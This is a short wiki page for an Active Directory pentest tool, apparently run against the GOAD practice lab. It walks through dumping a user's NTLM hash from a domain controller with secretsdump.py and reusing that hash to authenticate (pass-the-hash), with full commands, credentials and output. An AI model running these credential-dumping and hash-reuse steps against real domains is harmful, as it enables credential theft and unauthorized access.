-
Notifications
You must be signed in to change notification settings - Fork 3
Authenticating with NTLM hash
Daniel edited this page Apr 4, 2024
·
3 revisions
If you want to use a NTLM hash to authenticate on the LDAP or SMB you need to provide the NT hash. For example:
- Getting user hash through secretsdump.py
secretsdump.py sevenkingdoms.local/cersei.lannister:'il0vejaime'@192.168.56.10 -just-dc -just-dc-ntlm -user-status -just-dc-user cersei.lannister cersei.lannister:1115:aad3b435b51404eeaad3b435b51404ee:c247f62516b53893c7addcf8c349954b::: (status=Enabled)
- settings.json
{
"profile_name": "goad",
"profile_uuid": "5bc09493c1714c1c9ce122f962c3b8e3",
"host": "192.168.56.10",
"username": "sevenkingdoms.local\\cersei.lannister",
"password": "c247f62516b53893c7addcf8c349954b",
"domain": "sevenkingdoms.local"
}
- Result:
breads # load_profile goad * goad * adcs [+] Profile goad's selected successfully! [!] Profile settings: 192.168.56.10, sevenkingdoms.local\cersei.lannister, c247f62516b53893c7addcf8c349954b [!] There is already information stored in this profile, do you want to keep it? : y [!] Not changing current configuration breads # list_dcs [+] Domain Controllers: kingslanding.sevenkingdoms.local